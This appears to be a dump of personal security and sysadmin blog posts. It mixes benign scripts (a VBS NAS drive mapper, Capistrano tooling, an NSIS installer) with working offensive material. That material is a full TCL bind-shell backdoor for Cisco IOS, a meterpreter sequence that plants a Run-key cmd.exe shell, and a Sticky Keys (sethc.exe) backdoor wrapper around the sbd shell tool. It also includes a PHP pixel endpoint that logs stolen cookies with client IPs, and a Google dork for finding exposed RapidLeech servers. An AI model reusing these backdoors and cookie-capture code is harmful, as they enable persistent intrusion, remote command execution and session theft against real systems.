VBS Script to map NAS network smb drives over specific SSID wifi homenets (non GPO script)

I recently posted this script on usenet because some many people now
have NAS storage devices accessible via there home wifi networks.

This script should help out the people with the question on how to mount a network attached storage device (like my coolmax NAS) to there windows profile during windows boot.

This vbs works by utilizing the wmi and cimv2 mappings to access the the MSNdis_80211_Configuration and the Win32_NetworkAdapter references.

You need to have the local WMI service enabled for this to work.

FYI:This has been tested under Windows XP.

'file: nasmapper.vbs
'launch with "cscript c:\nasmapper.vbs //nologo" -> /programs/startup
'VBS Script to map NAS over wifi homenets (non GPO script)

'Shadowbq - 2009 BSD License
'Reference Functions: ScriptGuy! (MS)
', quiet_lurker (neowin), Aaron P(neowin)

Option Explicit

Dim objWMIService, objNet
Dim intSleep, WNICName, knownSSID, retries, maxRetries
Dim mapDrive, mapLocation, mapUsername, mapPassword

knownSSID="URWP80" 'SSID of Hotspot that has mapped location
WNICName="Dell Wireless 1470 Dual Band WLAN Mini-PCI Card"
'Nic name listed in WMI
maxRetries = 10
'maxRetries * intSleep/1000 ~= total possible seconds
intSleep = 2000 'wait cycles
mapDrive = "Y:" 'Map to Drive
mapLocation = "\\storage\public" 'Location of Share
mapUsername = "Guest" 'User Account for Share
mapPassword = "" 'User Password for Share

'If your having problems finding the WNICName you can use the
'\\root\wmi call to ("Select * From MSNdis_80211_Configuration") flip
' through all wireless devices..


Private Sub GetWMI(WMIArray, WMIQuery, WMIRoot)
'On error resume Next
DIM WMIClass

Set WMIClass = GetObject("winmgmts:{impersonationLevel=impersonate}!\_
\.\root\" & WMIRoot)
If not(WMIClass is nothing) Then Set WMIArray = WMIClass.ExecQuery_
(WMIQuery)

End Sub


Function SSID()
'On error resume Next
DIM objSSIDSet, objSSID, ID, i

Call GetWMI(objSSIDSet, "Select * from_
MSNdis_80211_ServiceSetIdentifier Where active=true", "wmi")

For Each objSSID in objSSIDSet
ID = ""

For i = 0 to objSSID.Ndis80211SsId(0)
ID = ID & chr(objSSID.Ndis80211SsId(i + 4))
Next

SSID = ID
Next
End Function

Function WNICStatus()
Dim colItems, objItem, strStatus

Call GetWMI(colItems, "Select * from Win32_NetworkAdapter where Name_
= '" & WNICName & "'", "cimv2")

For Each objItem in colItems
Select Case objItem.NetConnectionStatus
Case 0 strStatus = "Disconnected"
Case 1 strStatus = "Connecting"
Case 2 strStatus = "Connected"
Case 3 strStatus = "Disconnecting"
Case 4 strStatus = "Hardware not present"
Case 5 strStatus = "Hardware disabled"
Case 6 strStatus = "Hardware malfunction"
Case 7 strStatus = "Media disconnected"
Case 8 strStatus = "Authenticating"
Case 9 strStatus = "Authentication succeeded"
Case 10 strStatus = "Authentication failed"
Case 11 strStatus = "Invalid address"
Case 12 strStatus = "Credentials required"
End Select
Next

WNICStatus = strStatus
End Function

Function fnMapNetworkDrive (Drive, Path, Uname, Upass)
Dim i, oDrives
set objNet = Wscript.CreateObject("Wscript.Network")
Set oDrives = objNet.EnumNetworkDrives
For i = 0 to oDrives.Count - 1 Step 2
' Find out if an existing network drive exists
If oDrives.Item(i) = Drive Then
WScript.Echo "Removing drive: " & Drive
objNet.RemoveNetworkDrive Drive, true, true
End If
Next
WScript.Echo "Mapping drive: " & Drive & " to path: " & Path
objNet.MapNetworkDrive Drive, Path, false, Uname, Upass
fnMapNetworkDrive = "[completed mapping drive]"
Set i = Nothing
Set oDrives = Nothing
Set Drive = Nothing
Set Path = Nothing
End Function

Dim nicStatus, nicSSID

WScript.Echo "NAS Wifi Mapper"
WScript.Echo "=-=-=-=-=-=-=-=-=-=-=-=-=-=-"
WScript.Echo "[Checking NIC Status]"

nicStatus = WNICStatus()
retries = 0

while (StrComp(nicStatus, "Connected") <> 0)
If (retries < maxRetries) Then
retries = retries + 1
Wscript.Echo "Nic " & nicStatus & ".."
Wscript.Sleep intSleep
nicStatus = WNICStatus()
Else
Wscript.Error "*** Max # of connection attempts reached"
End If
Wend
Wscript.Echo "Connected .. continuing"

WScript.Echo "[Checking SSID Status]"
nicSSID = SSID()
nicSSID = Left(nicSSID, len(nicSSID)-1)

Wscript.Echo "SSID: " & nicSSID

If (StrComp(nicSSID, knownSSID) = 0) Then
Wscript.Echo "[Correct SSID]"
Else
On Error Resume Next
Dim errDescription, errSource
errSource = "NAS Mapper"
errDescription = "Incorrect SSID for network share to be established"
Wscript.Echo "An Error:'" & errDescription & "' by '" & errSource &_
"'."
WScript.Quit 8
End If

WScript.Echo "[Mapping Drive] "
Wscript.Echo fnMapNetworkDrive (mapDrive, mapLocation, mapUsername,
mapPassword)

WScript.Quit

Command Line Capistrano Forked

#!/usr/local/bin/ruby

# Command Line Capistrano Forked
# (Forked version)
# written by Scott MacGregor - 2008

require 'rubygems'
require 'capistrano/configuration'
require 'stringio'
require 'optparse'
require 'syslog'


#Gather list of hosts and create capistrano role string
def monitorlist(hostlist)
commandstring = "role :sensor, "
if hostlist.respond_to? :last
hostlist.each do |hosttarget|
hosttarget == hostlist.last ? commandstring << "\"#{hosttarget.strip}\"" : commandstring << "\"#{hosttarget.strip}\", "
end
else
commandstring << "\"#{hostlist.strip}\""
end
return commandstring
end

#Perfom desired login method
def logit (outputIO, logmethod)
if logmethod
Syslog.open('monitord')
outputIO.string.each {|line|

#ignore monitord information lines
if line.include?("\[monitord\]")
next
end


#strip out tty special characters
# ^\[[33m
line.gsub!(/\^\[\[[0-9]+m/,"")
# \e[37m
line.gsub!(/\e\[[0-9]+m/,"")
# \033[31m
line.gsub!(/\\[0-9]+\[[0-9]+m/,"")

#strip out preceding stars
line.gsub!(/^\s*[*]*/,"")

line.strip!

#uncomment this line if you want STDOUT while SYSLOGING
#p line

if line.downcase.include?("fail")
Syslog.crit(line)
else
Syslog.notice(line)
end
}
end
end

# Run Forked Process
def tick(queryhost, outputIO, logmethod)
pid = fork {

pidhost = Capistrano::Configuration.new
if OPTIONS[:syslog]
pidhost.logger = Capistrano::Logger.new(:output => outputIO)
else
pidhost.logger = Capistrano::Logger.new
end
pidhost.load(File.dirname(File.expand_path(__FILE__)) + "/capfile")
pidhost.load(:string => monitorlist(queryhost.strip))

# pidhost.set :user, 'capistrano'
# pidhost.ssh_options[:username] = monitord'
# pidhost.ssh_options[:host_key] = 'ssh-dsa'
# pidhost.ssh_options[:paranoid] = false

pidhost.logger.level = OPTIONS[:debug_level]
begin
#Call the Capistrano Namespace & command to fork
pidhost.monitor.default
rescue Exception => e
puts "\t[" + queryhost.strip + "] " + " Failed to establish connection."
outputIO.puts "\t[" + queryhost.strip + "] " + " Failed to establish connection."
end

logit(outputIO, logmethod)

}
Process.waitpid(pid, Process::WNOHANG)
end


# Set default options and initializations
OPTIONS = {
:file => "monitorlist",
:syslog => false,
:debug_level => 0,
:dest => File.expand_path(File.dirname($0)),
:hostslist => ""
}
hosts=[]

#Read Command Line Options
ARGV.options do |o|
script_name = File.basename($0)

o.set_summary_indent(' ')
o.banner = "Usage: #{script_name} [OPTIONS]"
o.define_head "Run capistrano command forked from outside capistrano with additional options.\nWritten by: Scott MacGregor 2008"

o.separator ""
o.separator "Monitord options:"
o.on("-R", "--read=[val]", String,
"Read monitor host list from file",
"Default: #{OPTIONS[:file]}") { |OPTIONS[:file]| }
o.on("-L", "--hosts=[val]", String,
"List of comma seperated hosts. Encased in double quotes.", "(*OVERRIDES -R option)" ) { |OPTIONS[:hostslist]| }
o.on("-S", "--syslog",
"SYSLOG all output") { |OPTIONS[:syslog]| }

o.separator ""
o.separator "Common Usage: "
o.separator "\t./monitord --hosts=\"hostname1, hostname2\""
o.separator "\t./monitord -R \"customhosts.txt\""

o.separator ""
o.separator "Common options:"
o.on("--debug=[0-3]", Integer,
"Debug verbosity level",
"Default: #{OPTIONS[:debug_level]}") { |OPTIONS[:debug_level]| }
o.on_tail("-h", "--help", "Show this help message.") { puts o; exit }

begin
o.parse!
rescue OptionParser::InvalidOption => e
abort "-h --help Show this help message."
end

end

if OPTIONS[:hostslist] == ""
#Read standard Capistrano Role string configuration file.
File.open(File.dirname(File.expand_path(__FILE__)) + "/#{OPTIONS[:file]}").each { |line|
hosts = line[(line.index(",")+2)..-1].gsub("\"","").strip.split(',') if not line =~ /^\s*#/
}
else
#Read env option string
hosts = OPTIONS[:hostslist].split(',')
end

# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
#Begin Main Loop

outputIO = StringIO.new
logmethod = OPTIONS[:syslog]

for host in hosts
tick(host.strip, outputIO, logmethod)
end

# End Main Loop
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

DNS version attempts & tools

There has been some DNS junk flying around again.. so refresh.

Dont forget how easy it is to do a DNS version attempt.

dig @ns.example.com -c CH -t txt version.bind

Make sure your BIND/Named is obfuscated/disabled with custom message..

options
{
version "Generic DNS Server";
}

Not that it helps much with fpdns around.

anonymous@:~$ fpdns -D google.com
fingerprint (google.com, 216.239.34.10): ISC BIND 8.3.0-RC1 -- 8.4.4
fingerprint (google.com, 216.239.36.10): ISC BIND 8.3.0-RC1 -- 8.4.4

Perl: (Fingerprint.PM)


Make sure your read basic DNS information like

Cisco's: DNS Best Practices, Network Protections, and Attack Identification

And understand the principles laid out in Secure BIND configurations such as:
http://www.cymru.com/Documents/secure-bind-template.html

Look into DNS Debug tools such as DNSwalk, dlint, & DOC

And for reverse lookups use where there is no PTR record try A record caches like:
Passive DNS Replication @
http://cert.uni-stuttgart.de/stats/dns-replication.php

Simple http get request... snooze.

Lets get some basic headers using sbd.exe, nc, telnet whatever..

telnet www.microsoft.com 80
nc www.microsoft.com 80
sbd -c off www.microsoft.com 80

Enter default HTTP / GET|OPTIONS|PUT|POST|HEAD|TRACE Command
(Using Host header is only important when there is vhosting on the IP/hostname)

GET / HTTP /1.1
Host: www.microsoft.com
Press Enter twice

(Windows telnet lameness.. Turning on local echo..)

Type "Ctrl+]"
Type "set localecho"
Press Enter twice

Digg + Idiots + RapidShare = p0wn3d

God damn it.. dumb ideas just stay around for far too long.

Ok we all know what the hell rapidshare is. It's a waste of internet space. One thing though a couple of years ago somebody dugg an article on a way to get around restrictions using a server script called rapidleech. Ok all in good fashion, but come on... you leave this open on apache server which can process php files.. and allow public upload to your server from any url.. (r57.php c99/100.php the list just goes on and on.. ) Renaming the file really helped huh..?

Just look at the multiversion google dork:
[2 years later and still 117+ zombies waiting to happen]
"Bugs Report to Rapidget.bug"

Digg idiots: http://digg.com/tech_news/RapidLeech

Capistrano with highline menu.

Example Capistrano file using the highline menu system..

(Capistrano really needs some better docs.)

#example capistrano menu using highline menu system
# Published under BSD license
# written by:shadowbq - http://shad0wbq.blogspot.com
# verified on: capistrano 2.2.0 & highline 1.4.0

role :comps, "localhost"

desc "Example Highline menu"
task :menu do
Capistrano::CLI.ui.say("\nThis is with a different layout...")
Capistrano::CLI.ui.choose do |menu|
menu.layout = :one_line

menu.header = "Execute"
menu.prompt = "Application? "

menu.choice :hello do
helloworld
end
menu.choices(:skip, :exit) do
Capistrano::CLI.ui.say("Choose not to run..")
end
end

end

task :helloworld do
run "echo helloworld."
end

Mozilla Prism & Pen-testing

Mozilla Prism , one in a series of recent site-specific-browsers(ssb) has become a fairly useful tool for me. I can run the web applications under different users (run as.. ). This allows limiting access and resources to the web application. It also allows running multiple different cookie sets at one time.

Simple example is having multiple gmail accounts logged in at one time. A more complex example is cookie manipulation while authenticated during access level enumeration.

Prism allows for the fine tuning of ssb to accommodate multiple pentesting angles.In the past I've rebranded Firefox and done similar things as running as guest users, but it was never this easy.

Prism and Flash on Windows
Its is pretty simple to enable your plugins (not talking extensions here.. ) on Prism on a windows system. All you have to do is copy your {program files}\Mozilla Firefox\plugins directory to your {program files}\Prism\Plugins directory. The Prism plugins directory doesnt exist by default and needs to be created. You may also want to copy the files into the XULRunner plugins directory. XUL runner handles any XUL apps that may depend on those plugins as well.

Shell code for IOS using TCLSH on Cisco devices..

An nice article that went out by IRM talked about simple way to create TCL backdoor for cisco IOS. You can read the white paper here.
Oops: didnt known what I was sourcing..

Router>en
Router#tclsh
Router(tcl)#source tftp://tftpserver/tclsh.tcl

Source:

# TclShell.tcl v0.1 by Andy Davis, IRM 2007
#
# IRM accepts no responsibility for the misuse of this code
# It is provided for demonstration purposes only
proc callback {sock addr port} {
fconfigure $sock -translation lf -buffering line
puts $sock " "
puts $sock "-------------------------------------"
puts $sock "TclShell v0.1 by Andy Davis, IRM 2007"
puts $sock "-------------------------------------"
puts $sock " "
set response [exec "sh ver | inc IOS"]
puts $sock $response
set response [exec "sh priv"]
puts $sock $response
puts $sock " "
puts $sock "Enter IOS command:"
fileevent $sock readable [list echo $sock]
}
proc echo {sock} {
global var
if {[eof $sock] || [catch {gets $sock line}]} {
} else {
set response [exec "$line"]
puts $sock $response
}
}
set port 1234
set sh [socket -server callback $port]
vwait var
close $sh

All material is IRM's, this is just a snippet from the article.

Low hangin fruit

Hacking old skool windows..

Notes from a CEH. Nothing new, but at least the basic are covered. This all should be automated by some wrapper so you don't waste time.. Generally you could do all this in Backtrack or similar builds.

http://hackathology.blogspot.com/2007/06/hacking-old-skoolz-windows.html

RSS / ATOM - Security Tagging Framework for Yahoo PIPES

I've been using YAHOO pipes for awhile to help filter some of the junk on full disclosure. Tagging became part of my daily habits so I thought it most appropriate to create auto taggers so I can read / filter much more quickly.

Security Tagging FrameWork

The basics of the PIPE is an array of regular expressions that strip off unneccessary titles, duplicates, responses, and add Pre-titles such as {Vulnerability}{Web-based}.

Ive also created an example on how to use the framework with existing YAHOO-PIPES.

Vulnerability Watch++ (Security Tagging Framework Example)

This PIPE aggregates two feeds and uniques them, and tags them utilizing the framework twice.

Side note:

GNUCitizen posted two nice articles on PIPES and their flexibility to be utilized with JSON database.

1. 5-generic-yahoo-pipes-hackers-cannot-live-without

2. Project Renaissance

QRcode - semanatic posting...

Email: r@qry.jp

QRcode decoding through the web... enjoy the robot.

Building NSIS Installers for Large File Distributions

I've been working on some solutions recently to distribute large data sets utilizing numerous compressed files groups. I decided the best way to dummy proof this was to wrap an installer around them and do it "right". So here is how to do that with an installer.

If you need to install, with only one setup application, two or more tar, bz2, gz, or lzma compressed files (for example multiple clustered files of over 2GB containing scientific data for your application and a couple others containing the app, and maybe a required piece of library software like winpcap) you need a robust solution such as the Nullsoft Install System - NSIS.

The most logical idea is to create a single file, but NSIS does have file size limitations within it's compiler. Currently it is about 2GB in size. So deploying a package of say 8GB (something that might normally fit on a Dual Layer DVD) is not possible with standard NSIS single file installers. This solution uses external plugins to decompress the files within the same directory framework as the installer. This allows you to create large file distributions that could be delivered on large media or across gigabit speed networks.

Tools Req:

7zip [installer] - Compression Utility
Notepad++ [installer] - IDE
NSIS [installer]
UltraModernUI NSIS User Interface [installer] - personal choice of GUI for NSIS installer
Untgz Contrib plugin [installer] - Decompression library

Files to Distrubute:
compressed_1.tar
-- decomp_set1of5_file1of2.txt
-- decomp_set1of5_file2of2.txt
compressed_2.tar
-- decomp_set2of5_file1of3.txt
-- decomp_set2of5_file2of3.txt
-- decomp_set2of5_file3of3.txt
compressed_3.tar
-- decomp_set3of5_file1of2.txt
-- decomp_set3of5_file2of2.txt
compressed_4.tar
-- decomp_set4of5_file1of1.txt
compressed_5.tar
-- decomp_set5of5_file1of3.txt
-- decomp_set5of5_file2of3.txt
-- decomp_set5of5_file3of3.txt

1
2
3 !include LogicLib.nsh
4
5 Function .onInit
6 # Section Size must be manually set to the size of the required disk space NSIS will not do this for external files.
7 # set required size of section number of kilobytes
8 # 8gb to kilo bytes = 8,388,608
9 SectionSetSize ${SecDecompress} 8388608
10
11;compressed_#.taz has be in the same directory as the Setup file.
12${If} ${FileExists} "$EXEDIR\compressed_1.tar"
13${AndIf} ${FileExists} "$EXEDIR\compressed_2.tar"
14${AndIf} ${FileExists} "$EXEDIR\compressed_3.tar"
15 ${AndIf} ${FileExists} "$EXEDIR\compressed_4.tar"
16 ${AndIf} ${FileExists} "$EXEDIR\compressed_5.tar"
17 Return
18 ${Else}
19 MessageBox MB_OK|MB_ICONINFORMATION "This copy of the installer is missing a compressed#.tar file.." IDOK abort
20 abort:
21 Banner::destroy
22 Abort
23 ${EndIf}
24
25 FunctionEnd
26
27 Section -decompress SecDecompress
28
29 ;UnTGZ Plugin
30 ;compressed_#.tar in this example is not compressed by gzip just tar collection
31 ; untgz plugin requires -znone to denote this
32
33 untgz::extract -j -d "$INSTDIR\" -znone"$EXEDIR\compressed_1.tar"
34 ${If}${FileExists} "$INSTDIR\decomp_set1of5_file1of2.txt"
35 ${AndIf} ${FileExists} "$INSTDIR\decomp_set1of5_file2of2.txt"
36 untgz::extract -j -d "$INSTDIR\" -znone"$EXEDIR\compressed_2.tar"
37 ${AndIf} ${FileExists} "$INSTDIR\decomp_set2of5_file1of3.txt"
38 ${AndIf} ${FileExists} "$INSTDIR\decomp_set2of5_file2of3.txt"
39 ${AndIf} ${FileExists} "$INSTDIR\decomp_set2of5_file3of3.txt"
40 untgz::extract -j -d "$INSTDIR\" -znone"$EXEDIR\compressed_3.tar"
41 ${AndIf} ${FileExists} "$INSTDIR\decomp_set3of5_file1of2.txt"
42 ${AndIf} ${FileExists} "$INSTDIR\decomp_set3of5_file2of2.txt"
43 untgz::extract -j -d "$INSTDIR\" -znone"$EXEDIR\compressed_4.tar"
44 ${AndIf} ${FileExists} "$INSTDIR\decomp_set4of5_file1of1.txt"
45 untgz::extract -j -d "$INSTDIR\" -znone"$EXEDIR\compressed_5.tar"
46 ${AndIf} ${FileExists} "$INSTDIR\decomp_set5of5_file1of3.txt"
47 ${AndIf} ${FileExists} "$INSTDIR\decomp_set5of5_file2of3.txt"
48 ${AndIf} ${FileExists} "$INSTDIR\decomp_set5of5_file3of3.txt"
49 Goto EverythingOk
50 ${Else}
51 MessageBox MB_OK|MB_ICONEXCLAMATION "Installation Failure. Media may be corrupt." IDOKabort
52 abort:
53 Banner::destroy
54 Abort
55 ${EndIf}
56 EverythingOK:
57
58 ;If tar files were packaged into the setup you can delete it like this :)
59 ;Delete "$INSTDIR\compressed#.taz"
60
61 SectionEnd

Session redirect in php and asp

These are examples of correct ways to handle access and redirects in sessions in asp(1.0|vbs) & php.. I dont know how may times I see this done wrong..

ASP example

<%
If NOT Session("Authenticated") = 1 Then
Response.Redirect ("login.asp")
'Response.Redirect ("login.asp", true); '<= This is the same as the default
'Exit ' <= This is called with default True statemens as above
End If
%>

PHP Example

<?PHP
if ($_SESSION['access'] != "yes")
{ header(Location:login.php); /* Redirect browser */
exit; /* Make sure that code below does not get executed when we redirect. */
}
//Code Following Should not be executed unless authenticated.
echo ("secure code");
?>

Note: Since PHP 4.4.2 and PHP 5.1.2 this function prevents more than one header
to be sent at once as a protection against header injection attacks.

Month of ... bugs

1. Month of browser bugs
2. Month of apple bugs
3. Month of kernel bugs
4. Month of PHP bugs
5. Month of MySPACE bugs

eh.. ergg.. cough.. die. this fad is getting old.. I hate even commenting on this at all.

Setting and Confirming reg keys w/meterpreter.

super quick meterpreter sequence
Prep

upload c:\\sbdbg.exe c:\\windows\\system32\\

Set

reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v NotSecurityIssueYourLookingFor -d "C:\\windows\\system32\\sbdbd.exe -l -p 4337 -a 127.0.0.1 -e cmd.exe -r0"

Verify

reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
reg queryval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v NotSecurityIssueYourLookingFor

Use

(reboot)

Comparing Common Vulnerability Result Sets

One of the major things I've been working on is bring together vulnerability result information. I found that it was a major pain in ass to be able to remove duplicate entries from result sets. I was finally able to come up with listing for based on CVE / BID tracking numbers:

An example corresponding file could be something like this

Tenable Nessus 3.0 - to - Harris Guardian Scanner [download txt]

Just extracting Nessus Information can be a huge problem. Because of the lack of structure within the nasl scripting language, there are many many variations on the output generated by the plugins. I've made some additional changes to an old tool.

nessus_extract.pl (version 1.7) [download perl]

I added pipes into the fray, generating a recursive style csv to separate BID and CVE numbers as well as a more robust double-quote word qualifier.

One huge help is the Open Source Vulnerability Data Base (osvdb) which has come a long way.

Pentest Order of Objects..

ISSAF was used in conjuction with the latest backtrack release.
Although it is not my company's standard it is quite close.

Not to be too open.. but this has lead to a really good idea for object orient coding.

Information Systems Security Assessment Framework (ISSAF) draft 0.2
ASSESSMENT

INFORMATION GATHERING
-Archive
-DNS
-Route
-SMTP
-Searchengine
-Survey
-Whois
NETWORK MAPPING
-Identify Live Hosts
-OS-Fingerprinting
-Portscanning
-Service Fingerprinting
-Identify Border Assets
-(SNMP - MIB Browsing)
-(VPN)
-Web/Public Application Mapping(Crawling)
VULNERABILITY IDENTIFICATION
-(Cisco)
-Database
-Fuzzers
-SMB Analysis
-SNMP Analysis
-Security Scanner
-Web Analysis
PENETRATION
-Exploits (metasploit)
-Exploits (CoreImpact / Canvas)
-Exploits (milworm /secfocus)
GAINING ACCESS AND PRIVILEGE ESCALATION
-Password Attacks
-Default Conf Attacks
-Sniffers
-Spoofing
ENUMERATING FURTHER
-Management Infrastructure (ie. WMI,SNMP,CDP)
-Pull Passwords (hashes, SAM FILES)
-Priviledged Assessment(Repeat all Steps)
COMPROMISE REMOTE USERS/SITES
-Targeted Phishing
-DNS Poisoning
MAINTAINING ACCESS
-Covert Channels
-Rootkits
-Portknocking
-Proxy
-Tunnels
COVER THE TRACKS
-House Cleaning

SBD as netcat

Yeah so I rattle off some SBD stuff sometimes.. Im referring to the netcat clone called sbd. SBD is Shadowinteger's Backdoor located @ http://tigerteam.se/dl/sbd/. This is my perferred "swiss army knife" because of its default configuration of encryption(AES-CBC-128 + HMAC-SHA1 encryption) and dangerous execution binding (-e command).



Netcat and its NC Clones:

• netcat - "swiss army knife"
• sbd & sbdbg.exe - shadowinteger's backdoor
• netcat6 - swiss army knife+ for ipv6
• cryptcat - netcat with twofish encryption
• socat - Multipurpose relay(netcat++) IPV6/SSL Example usage:
  socat TCP6-LISTEN:8080,reuseaddr,fork PROXY: proxy:www.domain.com:80

Simpler tools:

• nc.pl - perl netcat-like implementation
• netcopy - reciever
  
  
• netsend - transmitter for netcopy
• urocat - simple cat clone
  
  

None of this is news.. I just wanted to point out some of this simple stuff.

sbd fun as a rookit via sethc.exe

SBD Fun

Transfering files

RCV: sbd -l -p 4337 > outputfile
XMIT: cat infile | sbd 127.0.0.1 4337 –q 10

Transfering files through .tar.gz

RCV: sbd -l -p 4337 | tar xvfpz –
XMT: tar zcfp - /path/to/directory | sbd -w 3 127.0.0.1 4337

PORT Scan:

echo EXIT | sbd -v -w 1 127.0.0.1 20-250 500-600 5990-7000

Using Cmd.exe to bind to service
In my experience this is flaky at best..

create then start service:

sc create testsvc binpath= "cmd /K start" type= interact
sc start testsvc

Note that this time, the SC START immediately creates a new CMD window, even if the original CMD window failed to start with error 1053 (this is expected since CMD.EXE doesn’t have any service related code in it).

SCM starts a service
RegisterServiceCtrlHandler API

We may want to fix any C program to actually handle the correct calls if loading them as a legitimate service.

Simple C++ sbd wrapper
(Rename sbdbg.exe to svchost in this example.)

#include <cstdlib>
#include <iostream>

using namespace std;

int main(int argc, char *argv[])
{
// Lets restrict address to localhost only.. pls.
system("c:\\tmp\\svchost.exe -l -p 4337 -a 127.0.0.1 -e cmd.exe -r0");
return EXIT_SUCCESS;
}

Rootkit portion
Rename output binary to sethc.exe .. works ok.

Prefetch restrictions.
Remember to delete any exisiting sethc.exe files in c:\windows\prefetch prior to use.

Interesting Note about RDC
Sticky Keys [left-shift x5](sethc.exe) works through Remote Desktop Connections(RDC/RDP). Funny how suddenly that makes this all the more interesting.

Apparently the SYSTEM Kernel security shuts down all unknown process on sweep @5 minutes into session.

Can there fake handler for WM_CLOSE? or terminate...

PNG Listener w/logger

This is an example of a simple PNG listener with a logging mechanism.
(Do I really have to explain how to use this?)

<?php
$cookie = $_GET["c"];
if ($cookie == "init")
{$file = fopen('001.txt', 'w');
fwrite($file, ":: 00* Logger:: \n");
}
else{
$file = fopen('001.txt', 'a');
fwrite($file, $_SERVER['REMOTE_ADDR']."=>".$cookie . "\n");
}
header("Content-type: image/png");
$im = imageCreate(1,1);
$background = imageColorAllocate($im, 255, 255, 255);
imagePNG($im);
imageDestroy($im);
}
?>

I developed this snippet while working on a solution for browser history leaks.